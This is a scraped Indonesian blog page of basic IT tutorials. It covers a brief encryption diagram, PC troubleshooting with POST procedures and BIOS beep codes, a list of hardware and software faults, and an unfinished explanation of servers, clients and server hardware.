Pada bagian selanjutnya kita akan membahas berbagai macam teknik enkripsi yang biasa digunakan dalam sistem sekuriti dari sistem komputer dan network.

A. Enkripsi Konvensional.

Proses enkripsi ini dapat digambarkan sebagai berikut :

Plain teks -> Algoritma Enkripsi -> Cipher teks ->Algoritma Dekrispsi -> Plain teks
User A |                                                       | User B
|----------------------Kunci (Key) --------------------|

Minggu, 14 Agustus 2011

Mendiagnosa Permasalahan PC

Minggu, Agustus 14, 2011 Posted by DENDY JEFRIANA No comments


POST (Power on Self-Test)

Yaitu test yang dilakukan oleh PC untuk mengecek fungsi-fungsi komponen pendukung PC apakah bekerja dengan baik. POST dilakukan PC pada saat booting, jika PC mengalami suatu masalah maka akan dapat terdeteksi gejala kesalahannnya melalui POST, PC akan memberikan pesan/peringatan kesalahan dalam bentuk suara yang dihasilkan melalui speaker atau tampilan visual dimonitor. Selain itu pesan/peringatan kesalahan juga dapat dideteksi melalui kinerja dari PC.

POST memungkinkan user dapat mendeteksi, mengisolasi, menentukan, dan menemukan kesalahan sehingga dapat memperbaiki penyimpangan atau kerusakan yang terjadi pada PC. Mekanisme POST disediakan oleh semua produk PC atau motherboard dan tersimpan di dalam ROM atau flash ROM BIOS. Secara umum proses dan prosedur yang dilakukan dalam POST pada semua produk motherboard sama. Terdapat beberapa perbedaan yang menjadikan ciri dari produk motherboard tertentu, tetapi pada dasarnya tetap sama.

Prosedur POST (Power on Self-Test)

POST dilakukan sesaat setelah komputer dihidupkan dan mulai booting, proses ini dilakukan oleh BIOS. Adapun urutan prosedur POST adalah sebagai berikut :

    Test Power Supply ditandai dengan lampu power hidup dan kipas pendingin power supply berputar.
    Secara otomatis dilakukan reset terhadap kerja CPU oleh sinyal power good yang dihasilkan oleh power supply jika dalam kondisi baik pada saat dihidupkan, kemudian CPU mulai melaksanakan instruksi awal pada ROM BIOS dan selanjutnya.
    Pengecekkan terhadap BIOS dan isinya. BIOS harus dapat dibaca. Instruksi awal ROM BIOS adalah jump (lompat) ke alamat program POST.
    Pengecekkan terhadap CMOS, CMOS harus dapat bekerja dengan baik. Program POST diawali dengan membaca data setup (seting hardware awal) pada RAM CMOS setup, sebagai data acuan untuk pengecekan.
    Melakukan pengecekkan CPU, timer (pewaktuan), kendali memori akses langsung, memory bus dan memory module.
    Memori sebesar 16 KB harus tersedia dan dapat dibaca/ditulis untuk keperluan ROM BIOS dan menyimpan kode POST.
    Pengecekkan I/O controller dan bus controller. Controller tersebut harus dapat bekerja untuk mengontrol proses read/write data. Termasuk I/O untuk VGA card yang terhubung dengan monitor. Jika ada salah satu prosedur POST yang tidak berhasil dilewati maka PC akan menerima pesan/peringatan kesalahan dari POST. Pesan/peringatan kesalahan berupa kode beep yang dikeluarkan melalui speaker yang terhubung dengan motherboard atau tampilan di layar monitor sesuai dengan standar masing-masing motherboard.

Kode Beep AWARD BIOS

    1 beep pendek : PC dalam keadaan baik
    1 beep panjang : Problem di memori
    1 beep panjang 2 beep pendek : Kerusakan di modul DRAM parity
    1 beep panjang 3 beep pendek : Kerusakan di bagian VGA.
    Beep terus menerus : Kerusakan di modul memori atau memori video

Kode Beep AMI BIOS

    1 beep pendek : DRAM gagal merefresh
    2 beep pendek : Sirkuit gagal mengecek keseimbangan DRAM Parity (sistem memori)
    3 beep pendek : BIOS gagal mengakses memori 64KB pertama.
    4 beep pendek : Timer pada sistem gagal bekerja
    5 beep pendek : Motherboard tidak dapat menjalankan prosessor
    6 beep pendek : Controller pada keyboard tidak dapat berjalan dengan baik
    7 beep pendek : Video Mode error
    8 beep pendek : Tes memori VGA gagal
    9 beep pendek : Checksum error ROM BIOS bermasalah
    10 beep pendek : CMOS shutdown read/write mengalami errror
    11 beep pendek : Chache memori error
    1 beep panjang 3 beep pendek : Conventional/Extended memori rusak
    1 beep panjang 8 beep pendek : Tes tampilan gambar gagal

Kode Beep IBM BIOS

    Tidak ada beep : Power supply rusak, card monitor/RAM tidak terpasang
    1 beep pendek : Normal POST dan PC dalam keadaan baik
    Beep terus menerus : Power supply rusak, card monitor/RAM tidak terpasang
    Beep pendek berulangulang : Power supply rusak, card monitor/RAM tidak terpasang
    1 beep panjang 1 beep pendek : Masalah Motherboard
    1 beep panjang 2 beep pendek : Masalah bagian VGA Card (mono)
    1 beep panjang 3 beep pendek : Masalah bagian VGA Ccard (EGA).
    3 beep panjang : Keyboard error
    1 beep : blank monitor VGA card sirkuit

    Langkah-langkah mengenal dan mengidentifikasi Pesan/Peringatan Kesalahan melalui POST (Power on Self-Test)

Untuk mengenal dan mengidentifikasi pesan/peringatan kesalahan melalui POST para peserta diklat harus memperaktekkan dan mengamati PC dari saat booting hingga selesai proses POST yang dilakukan oleh BIOS dan membaca buku manual setiap komponen PC, terutama motherboard. Dari situ akan diketahui banyak komponen, kegunaan, spesifikasi dan BIOS yang digunakan, termasuk setting pada BIOS nya.

    Pengenalan Pesan/Peringatan Kesalahan Saat Aktifasi Sistem OperasiDan Menjalankan Program Aplikasi

PC yang telah melewati POST (Power on Self-Test) dinyatakan memiliki hardware dan instaslasi yang baik. Permasalahan yang terjadi pada saat komputer telah lolos dari POST akan lebih komplek karena melibatkan fungsi perangkat keras dan lunak yang lebih luas terutama perangkat lunak. Sehingga kemungkinan kesalahan akan semakin banyak. Perangkat lunak yang terpasang di PC dibagi menjadi 2 yaitu sistem operasi dan program aplikasi. Sistem operasi merupakan suatu perangkat lunak yang berfungsi untuk mengelola semua sumberdaya sistem komputer di antaranya perangkat keras, program aplikasi, dan user untuk menjadi suatu sistem yang dapat bekerja dengan baik. Program aplikasi adalah perangkat lunak yang digunakan oleh user untuk melaksanakan pekerjaan atau aplikasi tertentu seperti mengetik, menggambar, menghitung, mendengarkan musik dan lain-lain.

    Aktifasi Sistem Operasi

    Booting terhenti setelah berhasil melaksanakan POST : Instalasi fisik hard disk, setting device, prioritas boot pada CMOS setup bermasalah, Kerusakan pada sistem operasi, mungkin file sistem operasi rusak, hilang, terkena virus, berganti nama atau berpindah folder.
    Kinerja booting sampai ke windows berlangsung dengan lambat : Manajemen memori bermasalah, Kerusakan pada sistem operasi, mungkin file sistem operasi rusak, ada file yang hilang, terkena virus, berganti nama atau berpindah folder Monitor.
    Windows explorer tidak dapat dijalankan, tidak dapat mengcopi, mengganti nama file dan lain-lain : Kerusakan pada sistem operasi, mungkin file windows explorer rusak, hilang, terkena virus, berganti nama atau berpindah folder.
    Start menu tidak dapat dijalankan : Kerusakan pada sistem operasi, mungkin file windows explorer rusak, hilang, terkena virus, berganti nama atau berpindah folder.
    Prosedur Shutdown tidak dapat dilaksanakan : Kerusakan pada sistem operasi, mungkin file windows explorer rusak, hilang, terkena virus, berganti nama atau berpindah folder.
    Prosedur Shutdown berhenti sebelum komputer benar-benar mati : Reset CMOS battery, Kerusakan pada sistem operasi, mungkin file sistem operasi rusak, ada file yang hilang, terkena virus, berganti nama atau berpindah folder.

    Aktivasi Program Aplikasi

    Program tidak ada di start menu, desktop : Shortcut terhapus, File program aplikasi rusak, expire, hilang, terkena virus, berganti nama atau berpindah folder.
    Program tidak dapat dijalankan : Manajemen memori bermasalah, Setting resolusi monitor bermasalah, Registrasi program, expire, Instalasi program tidak lengkap, File program aplikasi rusak, file yang hilang, terkena virus, berganti nama atau berpindah folder.
    Kinerja program lambat : Manajemen memori bermasalah, Prosessor bermasalah, File program aplikasi rusak, file ada yang hilang, terkena virus, berganti nama atau berpindah folder.
    Program selalu meminta CD : Instalasi program tidak lengkap, Setting program, File program aplikasi rusak, file yang hilang, terkena virus, berganti nama atau berpindah folder.
    Fungsi-fungsi menu tidak dapat dijalankan : File program aplikasi rusak, file ada yang hilang, terkena virus, berganti nama atau berpindah folder.
    Tidak ditemukan file data, tidak dapat membu-ka file data atau ekstensi file data berubah : File program aplikasi rusak, file ada yang hilang, terkena virus, berganti nama atau berpindah folder.

Penyimpangan Fungsi Peralatan I/O


PC yang telah melewati POST (Power on Self-Test) dianggap secara hardware dan instaslasinya baik. Tetapi untuk mengetahui kemampuan dan kinerjanya perlu dilaksanakan tes. Khusus untuk perangkat keras, PC menyediakan saluran Input dan Output, diantaranya yaitu :

    Serial Port yaitu saluran yang menyalurkan data input/output secara serial atau COM.
    Paralel Port yaitu saluran yang menyalurkan data input/output secara paralel atau LPT.
    USB Port atau Universal Serial Bus yaitu port serial yang bersifat Universal (umum).
    Expantion Slot yaitu slot yang digunakan untuk menancapkan (memasang) card peripheral tambahan. Slot ekspansi ada 3 macam ISA, EISA, PCI dan AGP.
    Selain itu termasuk juga saluran atau port untuk mouse dan keyboard, VGA dan lain-lain yang terhubung dengan peralatan di luar.

POST akan mencatat dan menguji unit I/O yang terpasang dan sistem operasi akan mengaktifkan fungsi-fungsi I/O tersebut agar dapat digunakan untuk program aplikasi. Adapun gejala yang ditimbulkan sebagai tanda adanya masalah pada unit I/O sangat beraneka macam, seperti : alat tidak bekerja dengan baik, informasi di layar, kode beep, dan lain-lain.

    Prosedur Test

Adapun urutan prosedur test yang dilakukan adalah sebagai berikut :

    Semua peralatan dipasang pada port yang sesuai. Khusus mouse sebaiknya bergantian (PS/2 atau COM 1 atau COM 2, atau USB).
    Booting komputer, POST akan mengecek semua saluran I/O dan alamat I/O. Jika tidak ada masalah maka semua I/O yang tersedia berfungsi dengan baik.
    Pengecekkan fungsi Keyboard dan Mouse.
    Pengecekkan tampilan pada layar monitor, jika tidak ada masalah maka setting layar monitor dapat dimaksimalkan.
    Pengecekkan paralel port dan USB melalui program aplikasi Microsoft word.
    Pengecekkan pembacaan disk dan CDROM melalui Windows Explorer.
    Pengecekkan kemungkinan-kemungkinan kerusakan hardware dan software. Instalasi komponen hardware, secara bergantian dilepas dan dipasang kembali (saat melepas dan memasangkomponen hardware kondisi PC harus dimatikan terlebih dahulu) kemudian komputer dihidupkan kembali. Amati dan catat kondisi yang terjadi. Pengecekkan pada PC, apabila driver hardware dihapus dan kemudian diinstal kembali.

Test dilakukan termasuk dengan mengecek driver dari peralatan yang dihubungkan dengan I/O. Karena bisa saja sesuatu peralatan atau komponen yang dipasang dapat bekerja, tetapi tidak optimal karena driver yang digunakan belum sesuai dengan peralatan.

    Keyboard tidak bekerja : Hubungan Keyboard dan PC bermasalah, Keyboard rusak atau saluran keyboard di Motherboard rusak
    Mouse tidak bekerja (PS2/Com/USB) :  Hubungan Mouse dan PC bermasalah, Mouse rusak atau saluran mouse (PS2/Com/USB) di Motherboard rusak
    Monitor Tidak Dapat menampilkan gambar :  Hubungan antara VGA card dan monitor bermasalah, VGA card bermasalah,  Monitor bermasalah
    Monitor menampilkan resolusi dan warna tidak optimal : Setting driver monitor, Hubungan antara VGA card dan monitor bermasalah, VGA card brmasalah, Monitor bermasalah
    Print preview pada program aplikasi tidak dapat dilakukan : Driver printer belum terintsall
    Print tidak dapat dilaksanakan (Printer melaui LPT/USB) : Driver belum benar, Hubungan printer dengan LPT/USB bermasalah, Power belum aktif, Tidak tersedia kertas atau tinta tidak tersedia, Catride tinta tidak ada, Printer rusak
    Mencetak tidak sesuai dengan yang diinginkan, misal berulang-ulang, hal tidak sesuai dll : Setting printer belum sesuai
    Disk dan CD ROM tidak terdeteksi : Hubungan instalasi fisik dan power disk/CD ROM dengan motherboard bermasalah, Setup di BIOS belum sesuai, Aktifasi hardware diskdrive di windows bermasalah
    Disk atau CD ROM Tidak dapat membaca data : Disket/CD ROM yang dibaca bermasalah, Head atau sensor baca (optic) bermasalah, mungkin kotor, setting fisik berubah atau sudah lemah (rusak)

Klasifikasi, Identifikasi, dan Penentuan Hipotesa Awal Penyebab Masalah

Klasifikasi Permasalahan Pengoperasian PC

Permasalahan PC dapat diklasifikasikan menjadi 2 kelompok yaitu: hardware / perangkat keras dan software / perangkat lunak.

    Hardware / Perangkat keras

Internal

    Monitor  : Monitor mati, Monitor blank, Monitor menampilkan gambar tidak proporsional, Warna tampilan tidak sesuai aslinya, Monitor berkedip-kedip.
    Motherboard : CPU mati, Komputer cepat panas dan atau hang, Kinerja komputer lambat, Tidak dapat shuddown, Komputer selalu meminta setup CMOS
    Port Paralel (LPT) : Tidak dapat mencetak di printer, Tidak dapat melakukan hubungan komunikasi dengan computer lain melaui Laplink dengan parallel port
    Port Serial : Mouse melalui serial port tidak dapat digunakan, Peralatan eksternal lain yang melaui serial port tidak dpat digunakan, seperti modem eksternal.
    Port Game : Tidak dapat atau akses melaui joystick yang terpasang di port game kacau
    Port USB : Mouse atau perlatan eksternal lain yang terpasang di port USB tidak dapat bekerja tau kacau, Peralatan lain seperti printer, flash memory, scanner, kamera digital.
    VGA Card : CPU mati, Gambar kacau, Setting tidak maksimal, Tidak dapat mengakses program tertentu, Akses grafik lambat
    Sound Card : Tidak ada atau kacau suara yang keluar di speaker aktif
    RAM : CPU mati, Memori yang terbaca pada saat POST tidak sesuai, Akses program lambat
    Prosessor : CPU mati, Prosessor cepat panas, Prosessor sering Hang
    Chip BIOS : CPU mati, Tidak dapat booting, Tidak dapat melakukuan identifikasi hardware dan POST
    Hard disk : Tidak terdeteksi BIOS, Tidak dapat booting, Cepat Hang, Akses program lambat, Disk drive Tidak dapat membaca /menulis /memformat/menghapus isi disk
    CD/DVD ROM Read/Write : Tidak dapat membaca/menulis /memformat CD/DVD, Kabel Data Hardisk,diskdrive,CDROM tidak terdeteksi atau tidak dapat diakses
    Power Supply : CPU mati
    Panel depan CPU : Saklar/lampu mati dan CPU tidak dapat dihidupkan
    Keyboard : Keyboard mati, tidak terdetekdi BIOS, Tombol ada yang tidak dapat digunakan
    Mouse : Mouse tidak terdeteksi windows & tidak dapat digunakan, Salah satu fungsi mouse tidak dapat digunakan
    Speaker aktif : Speaker mati, Suara speaker tidak keluar.

Eksternal

    Printer : Printer mati, Selalu muncul warning di monitor, Mencetak tidak sesuai setting, Catridge/pita tidak terdeteksi, Tinta/pita habis atau buram, Print kertas double
    TV tuner : TV tuner mati, Gambar tidak jelas, Tidak dapat menyipan ke memori, Suara tidak ada
    Modem : Modem mati, Tidak dapat menghubungi provider (ISP), Akses internet lambat
    Scanner : Scanner mati, Tidak dapat membaca berkas/blank, Hasil scan pecah-pecah
    Flash memory : Flash memory mati, Tidak terdeteksi oleh system operasi, Tidak dapat membaca/menulis/ menghapus data.
    Kamera digital : Kamera mati, Tidak dapat membaca berkas/blank, Hasil foto pecah-pecah
    CD/DVD ROM Read/Write eksternal :  Tidak dapat membaca /menulis  /memformat CD/DVD

    Software / Perangkat Lunak

    Perangkat lunak BIOS : · Komputer mati, Komputer hidup tapi blank atau tidak ada tampilan di layar dan tidak ada aktivitas, Komputer tidak dapat di setting hardwarenya, setting kacau dan POST tidak jalan.
    Sistem Operasi : Tidak dapat booting, Kinerja booting sampai ke windows berlangsung dengan lambat, Windows exsploler tidak dapat dijalankan, tidak dapat mengcopi, mengganti nama file dan lain-lain,  Start menu tidak dapat dijalankan, Prosedur Shutdown tidak dapat dilaksanakan, Prosedur Shutdown berhenti sebelum komputer benar-benar mati
    Program aplikasi : Program tidak ada di start menu, desktop, Program tidak dapat dijalankan, Kinerja program lambat, Program selalu meminta CD, Fungsi-fungsi menu tidak dapat dijalankan, Tidak ditemukan file data, tidak dapat membuka file data atau ekstensi file data berubah

Identifikasi Kemungkinan Penyebab Permasalahan

Kemungkinan kerusakan menjadi lebih sempit baik secara hardware maupun software, karena dalam banyak masalah keduanya saling terkait. Sebagai contoh, yaitu : hard disk tidak terdeteksi oleh PC, kemungkinan kerusakan ada disekitar hard disk yaitu :Hardware : Hard disk, setting jamper hard disk, Kabel data dan power ke hard disk, Bus I/O pada motherboardSoftware : BIOS settingNB : Bagian-bagian yang sudah diidentifikasi dapat dilakukan pengecekkan, sebaiknya dilakukan dari hardware dulu, baru software. Dengan cara melokalisir seperti di atas dimungkinkan permasalahan akan relatif cepat diketahui.

Menentukan Hipotesa Awal Penyebab Masalah

Untuk mendukung menentukan hipotesa awal user harus mengetahui semua komponen dan fungsinya pada sistem komputer, serta beberapa data kemungkinan penyebab kerusakan komputer, misalnya : tegangan AC tidak stabil, debu yang lembab di motherboard komputer, head pembaca disk yang kotor, penggunaan tidak sesuai, virus, umur hardware, dll.Kemungkinan kerusakan pada :

    Disket: : disket sudah rusak/kotor pada lempengan data
    Head disk drive kotor : kemungkinan disebabkan debu menempel di head disk drive
    Motherboard, kabel data: kemungkinan karena soket kabel data sudah aus/tidak kencang atau ada yang putus

memahami SERVER dengan benar

Minggu, Agustus 14, 2011 Posted by DENDY JEFRIANA No comments

Banyak yang susah memahami Server, karena “kadung” menganggapnya sebagai bahasan yang sulit dan “sangar”. Padahal sejatinya Server merupakan perangkat yang mirip dengan PC Desktop, baik dari sisi arsitektur, device serta pendukungnya.Yang membedakan hanya dari sisi segmentasi dan fungsinya. Itulah yang menjelaskan kenapa PC Desktop bisa juga dijadikan sebagai Server (bahkan notebook aja bisa!), walaupun sangat tidak direkomendasikan!
Ada juga yang menyangka harga server masih mahal. Padahal saat ini harganya sudah mulai mengarah ke “price-war”, disebabkan banyaknya pemain, baik branded maupun lokal. Kalo kita melihat iklan Kompas di hari Senin dan Selasa, maka akan terlihat vendor server berlomba-lomba membranding produk mereka. Kompetisinya sudah sama seperti iklan Notebook !Belum lagi sudah dirilisnya software pendukung, seperti Microsoft Windows Server 2008 atau Linux versi baru yang full server.Intel saja menyediakan web khusus untuk developer software server berbasis Linux.

Teknologi Server
Server memiliki karakteristik yang sedikit berbeda dari PC Desktop, walaupun pada dasarnya menggunakan teknologi yang sama.
1.      Processor menggunakan Intel Xeon seri 3000, 5000 dan 7000.
Dulu Processor Intel Pentium 4, Pentium D serta Core 2 Duo bisa digunakan sebagai Processor server value, tapi pada saat ini sebaiknya menggunakan Xeon series saja karena socket-nya sudah mendukung LGA775*. Kelebihan Xeon adalah dukungannya terhadap konfigurasi Dual Processor (DP) dan Multi Processor (MP)**. Seri Xeon 7000 merupakan processor lama yang masih menggunakan socket lama (socket-604). Jika membutuhkan server dengan komputasi rumit, dapat memilih platform Intel Itanium2 yang saat ini sudah mulai dijual retail.
2.      Motherboard memiliki dua tipe, yaitu tipe Dual Socket (untuk Dual Processor) dan Single Socket.
Serinya sudah gampang dipahami, yaitu S5000xxx (untuk Xeon 5000 Dual) dan S30000xxx (untuk Xeon 3000 Single).Untuk Motherboard value yang tidak menggunakan processor Xeon, dapat memilihi seri Intel S975XBX2 dan X38ML (dengan Processor Core 2 Duo dan Core 2 Quad).Untuk melihat apakah MB Intel merupakan bagian dari Server, lihat saja pada nama motherboard-nya (ada kode “S” didepannya seperti S975XBX2).
3.      RAM menggunakan DDR1/DDR2 ECC Registered atau FBDIMM. Visipro sudah memililki varian Produk ini.
Kapasitas yang dianjurkan untuk server adalah minimal 1GB (dengan 2x 512 MB in Dual Channel).Kapasitas rata-rata sebuah server board adalah 4 GB – 16 GB.
4.      HDD menggunakan SATA, SCSI atau SAS.
Seagate sudah merilis HDD SATA khusus untuk Server, yaitu Barracuda ESþ yang dapat beroperasi 24-jam x 7-hari tanpa henti. Barracuda ES berbeda dengan Barracuda 7200 walaupun teknologinya sama.Atau bisa menggunakan SCSI Seagate Cheetah 10K dan 15K (68-pin danþ 80-pin).Jika ingin menggunakan HDD berukuran 2.5” (Notebook) dengan teknologi SCSI, dapat menggunakan Seagate Savvio.Saat ini juga sudah dikembangkan interface HDD SAS (Serial Attachedþ SCSI) yaitu SCSI berbasis teknologi Serial. SAS kompatibel dengan SATA (tapi SATA tidak kompatibel dengan SAS).Seagate sudah merilis versi ini yaitu Cheetah SAS.
5.      RAID menggunakan on-board controller atau eksternal Card.
Hampir semua MB Server mengadopsi konfigurasi RAID pada sistemnya, seperti RAID 0, 1, 5 dan 10. Konfigurasi RAID ini umumnya berjalan di HDD SATA dan SAS.Jika MB tidak menyediakan itu, dapat menggunakan eksternal RAID card yang juga kita jual.
6.      Dual Ethernet Port
Perbedaan yang paling nyata antara MB Server dan Desktop adalah pada jumlah port LAN yang disediakan. Server selalu menggunakan dual port, dimana port 1 digunakan untuk koneksi Router, dan port 2 digunakan untuk koneksi ke Hub/Switch. Pada PC Desktop yang dijadikan server, biasanya digunakan LAN Card PCI tambahan.\
7.      Power Supply Unit (PSU)
Server menggunakan power supply khusus dengan daya yang cukup besar. Ini dikarenakan kebutuhan perangkat server memang lebih besar daripada PC Desktop.Selain itu, konektor power ke motherboard juga biasanya menggunakan jumlah pin socket yang berbeda, yaitu 24-pin dan 8-pin tambahan (desktop menggunakan 24-pin dan 4-pin tambahan). Kapasitas Power Supply server berkisar antara 500 ~ 800 watt. Selain itu, Server tipe tertentu (high end) biasanya menggunakan fitur REDUNDANT, yaitu dua buah power supply yang saling mem-backup satu sama lain. Jadi jika ada satu power supply yang mati, maka satunya dapat membackup sehingga server tidak perlu dimatikan (power-off).
8.      Chassis
Server mengenal dua tipe chassis, yaitu PEDESTAL dan RACKMOUNT.Pedestal serupa dengan chasing tower pada PC Desktop, yaitu dengan posisi berdiri.Rackmount merupakan chassis dengan tipe tidur (biasanya berbentuk pipih dan tipis). Rackmount dipasang pada rack server khusus, sehingga dapat di-instalasi lebih dari satu stack (tumpukan). Gunanya untuk membentuk sistem server terintegrasi yang terdiri dari berbagai fungsi yang terfokus, misalnya Web Server, Exchange (Email) Server, Application Server dan lain-lain.Pengembangan dari rackmount adalah BLADE Server, yaitu server densitas tinggi yang dibentuk dari beberapa server yang disusun secara vertikal bertumpuk (seperti roti tawar yang dipotong). BLADE server umumnya dibutuhkan oleh perusahaan dengan kapasitas besar dengan fungsi server yang berbeda-beda
Apa itu Server?
Sekarang kita hidup dalam dunia teknologi informasi yang sudah semakin “matang”.Sudah umum terlihat dimana-mana orang mengantri di ATM, check-in tiket di Bandara, menggesek kartu kredit di swalayan, mengakses informasi di warung internet atau ber-video-call melalui ponsel ber-fitur teknologi 3G.Jika dilihat secara sekilas, kita sedang menikmati sebuah fasilitas sistem informasi yang sangat simpel, hidup, relatif terjangkau dan selalu terkoneksi (on-line). Selamat datang di era teknologi informasi !
Berbagai perangkat yang memanfaatkan Server
http://opensource.telkomspeedy.com/wiki/skins/common/images/magnify-clip.png
Berbagai perangkat yang memanfaatkan Server
Tapi yang perlu diketahui bahwa sesungguhnya dibalik fasilitas tersebut terdapat satu infrastruktur jaringan komputer (computer network) kompleks yang terhubung satu sama lain. Infrastruktur ini bertugas untuk mengatur transfer informasi yang “ruwet” yang tersebar secara luas itu, lalu mengolah dan mengintegrasikannya menjadi satu fasilitas yang kita gunakan sehari-hari tersebut. Sistem infrastruktur ini menggunakan perangkat berbasis komputer dalam jumlah yang cukup banyak, yang dihubungkan melalui satu jaringan telekomunikasi sehingga memungkinkan perangkat tersebut berkomunikasi. Ujungnya, infrastruktur ini akan diolah, diatur dan diawasi oleh sebuah komputer induk, yang disebut sebagai SERVER. Jadi server adalah sebuah terminal akhir yang mengkoordinasikan semua akivitas yang terjadi pada sistem infrastruktur tersebut.
Bagaimana persisnya Server itu ?
Secara harfiah, server merupakan komputer yang berfungsi untuk mengatur atau menjadi koordinator pada sistem jaringan komputer.Intinya, Server merupakan induk dari semua komputer yang terhubung.Server bertugas menangani penyimpanan, pengolahan, pendistibusian data secara terpusat, juga sebagai pusat aplikasi bersama (shared) serta pintu gerbang menuju internet (gateway).
Misalnya : pada sebuah Warung Internet (warnet) yang menghubungkan banyak terminal komputer (PC Client) selalu tersedia minimal satu server yang berfungsi sebagai GatewayComputer. Gateway adalah server yang menghubungkan masing-masing PC klien dengan internet.
Ilustrasi sebuah Server dan Client
http://opensource.telkomspeedy.com/wiki/skins/common/images/magnify-clip.png
Server pasti tersedia pada setiap infrastruktur sistem informasi, seperti jaringan Warung Internet (Warnet), perkantoran, Game On-line, Internet Service Provider (ISP), Universitas, Anjungan Tunai Mandiri (ATM), dan lain sebagainya.
Selain itu, saat ini diberbagai tempat seperti Mal dan Airport sudah tersedia fasilitas koneksi internet nirkabel berbasiskan teknologi Wireless Fidelity (atau kita sebut sebagai “Hotspot”), seperti di Mal atau Airport. Ketika kita terkoneksi menggunakan Laptop dan browsing suatu situs, sesungguhnya ada sebuah server yang menghubungkan kita ke internet.
Selain itu, masih banyak contoh-contoh lain disekitar kita seperti, menelepon menggunakan HP, main game online, kasir di swalayan dan sebaganya.
Apa yang dimaksud dengan Client ?
Pada pengertian server, client (atau kadang disebut PC Client) adalah perangkat komputer yang terhubung dengan server.Analoginya adalah server itu adalah seorang Ibu sedangkan Client sendiri merupakan anak-anaknya.Client bisa berjumlah minimal satu komputer dan maksimal tidak terhingga.Client juga sering disebut sebagai Terminal atau Workstation (tapi bukan komputer workstation).Infrastruktur jaringan lokal (Local Area Network) pada dasarnya adalah sistem yang terjadi antara server dan client dalam skala tertentu.
Sebuah aktivitas perkantoran yang memanfaatkan server
http://opensource.telkomspeedy.com/wiki/skins/common/images/magnify-clip.png
Secara tradisional, client biasanya adalah sebuah PC Desktop.Tapi saat ini, sebuah client bisa merupakan sebuah Laptop, PDA, HP, Printer, Game Console dan lain-lain. Contohnya, sebuah Game Console seperti Sony Playstation 3 sudah dilengkapi dengan LAN Connector dan WiFi terintegrasi yang berarti dapat menjadi sebuah client.
Hubungan yang terjadi antara Server dan Client umumnya menggunakan dua tipe koneksi : Wire (menggunakan kabel) dan Wireless (tanpa kabel; nirkabel).
Contoh cara kerja sederhana sebuah Server
  • Perhatikan sebuah Warung Internet (Warnet) yang memiliki sekitar 10 unit atau lebih PC Desktop. Semua PC tersebut pasti terhubung melalui jalinan kabel LAN melalui sebuah perangkat Switch. Ketika kita mengakses internet dari salah satu PC, sebetulnya PC tersebut tidak terkoneksi internet secara langsung tapi dihubungkan oleh sebuah komputer induk yang disebut server. Server itulah yang melakukan koneksi ke internet melalui perangkat modem, lalu membagi koneksi tersebut pada komputer yang ada. Jadi tidak mungkin 30 unit PC dan harus terkoneksi satu-per-satu menggunakan modem secara terpisah ! Selain mahal, akan susah mengontrolnya. Jadi disana server mengambil peranan sebagai gateway (gerbang penghubung) ke dunia internet dan distributor koneksi kemasing-masing komputer.
Contoh cara kerja server dan klien yang terkoneksi internet
http://opensource.telkomspeedy.com/wiki/skins/common/images/magnify-clip.png
  • Pada kantor sebuah perusahaan umum menggunakan aplikasi ERP (Enterprise Resource Planning). ERP (seperti software SAP, ORACLE, JDEdward) merupakan sebuah aplikasi yang mengelola sumberdaya perusahaan secara terintegrasi, seperti stock gudang, manajemen keuangan, sales, purchasing, human resource, dan lain-lain sehingga manajemen puncak dapat mengakses berbagai informasi yang saling berkaitan dan seketika (real-time). ERP dijalankan oleh berbagai PC Desktop & notebook dibanyak divisi yang berbeda, yang jumlah bisa mencapai ratusan unit. Untuk mengelola sumberdaya ini, jelas membutuhkan sebuah “komputer induk” yang mendistribusikan berbagai informasi kesemua pihak yang membutuhkannya.
Mengapa Server berbeda dengan PC biasa ?
Server memiliki karakteristik khusus yang membedakannya dengan PC biasa. Tapi sebelumnya kita dapat melihat pembagian komputer berdsarkan fungsi & segmentasinya, menjadi lima bagian, yaitu PC Desktop, Notebook, Server, Workstation& Consumer Electronics. Lihat tabel dibawah :
Tabel Pembagian komputer berdasarkan fungsi & segmentasinya
Definisi
Ciri Khas
Pengguna
Server
Merupakan komputer "induk" dari suatu sistem jaringan komputer(network).
Performa tinggi. Beroperasi 24-jam x 7-hari non-stop. Device & periferal khusus. Harga "relatif" lebih mahal
Institusi, Bisnis, Kantor, dan sebagainya
PC Desktop
Merupakan komputer umum yang kita gunakan sehari-hari dirumah/kantor, dimana umumnya diletakkan diatas meja.
Umumnya diletakkan di atas meja (Desktop). Beroperasi rata-rata maks. 18-jam/hari. Device & periferal standar dan umum.
Individu, dirumah maupun dikantor
Notebook
Merupakan komputer "mobile" yang ditujukan untuk user yang mobile.
Gampang dibawa, ringan. Performa mirip dengan PC Desktop.
Mobile user.
Workstation
Merupakan komputer khusus yang digunakan kalangan profesional, umumnya untuk mengolah aplikasi tertentu.
Performa tinggi untuk aplikasi tertentu. PC Desktop High-End yang dimodifikasi. Processor, RAM, Graphics &HDD "kelas berat". Harga lebih mahal dari PC Desktop
Profesional : arsitek, sound engineer, video/film editor, graphics designer.
Consumer Electronics
Merupakan komputer yang digunakan pada perangkat berukuran kecil, mobile dan berfungsi pada aplikasi tertentu.
Dibawa kemana-mana, sangat ringan. Berfungsi pada aplikasi tertentu, misalnya telepon. Hanya bergungsi tunggal, sehingga performa rendah. Menggunakan baterai.
MP3 Player, Handphone, PDA, Video Player


Tabel Perbandingan kemampuan sebuah PC Desktop dan Server

PC Desktop
Server
Performa
Baik
Sangat Baik
Kebutuhan Daya (Power)
Relatif sedang
Relatif besar
Daya Tahan (reliabilitas)
Cukup Sangat
Baik
Upgradable
Sangat Baik
Baik (terbatas)
Lifecycle (umur pemakaian)
3 tahun
5 tahun
Kompatibilitas Software
Sangat Baik
Baik (terbatas)
Kompatibilitas Hardware
Sangat Baik
Baik
Harga
Standar
Relatif Lebih Mahal

Tabel Contoh perbandingan device antara PC Desktop dan Server

PC Desktop
Server
Processor Intel
Celeron D, Pentium 4, Pentium D, Core 2 Duo, Core 2 Quad
Xeon, Itanium2
Chipset Intel (Motherboard)
Intel 945G/P, 965G/P, G31, Q35, X38
Intel 5000P/V/X, 3000, 3210
Unbuffered (DDR, DDR2)
ECC atau ECC Registered (DDR, DDR2)
ATA (Parallel ATA)
Video Graphics
Integrated min. with 64 MB memory
Integrated only with 8/16MB memory
PCI Express x16
Power Supply
300 – 500 watt
600 – 1.000 watt
Chassis
Mini Tower, Tower
Pedestal, Rackmount, Blade
Server memiliki Karakter juga
Seperti hal-nya manusia, Server juga memiliki karakter tertentu yang membedakannya dengan komputer dan peralatan elektronik lain. Berikut merupakan karakter sebuah server :
Availability (Ketersediaan)
